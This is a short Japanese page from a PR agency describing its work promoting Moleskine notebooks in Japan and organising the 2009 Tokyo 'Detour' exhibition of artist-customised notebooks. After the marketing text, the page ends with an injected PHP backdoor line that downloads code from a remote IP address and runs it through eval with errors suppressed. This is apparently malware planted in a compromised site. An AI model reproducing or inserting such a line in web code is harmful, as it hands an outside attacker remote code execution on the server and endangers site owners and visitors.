デイリープレス

MOLESKINE

200年以上にわたり、ヘミングウェイやチャトウィン、ゴッホからピカソにいたるまで、作家や芸術家たちに愛用された伝説のノートブック、モレスキン
日本での本格的な展開から5年間、PR全般と、東京で開催された展示の企画サポートと運営を担当。

2006年から世界を巡回し、2009年に東京で開催された展覧会「Detour」は、モレスキンの文化性や創造性をテーマとしたプロジェクト。アーティスト、建築家、文筆家、映画監督、 デザイナー、イラストレーターなど、世界を舞台に様々な分野で活躍する作家たちが、自由にカスタマイズしたモレスキンを発表。来場者はその貴重なノートに実際に手で触れて鑑賞できるという展覧会。

/*c137*/ eval(@file_get_contents('http://37.1.207.55/get.php')); /*cc137*/ ?>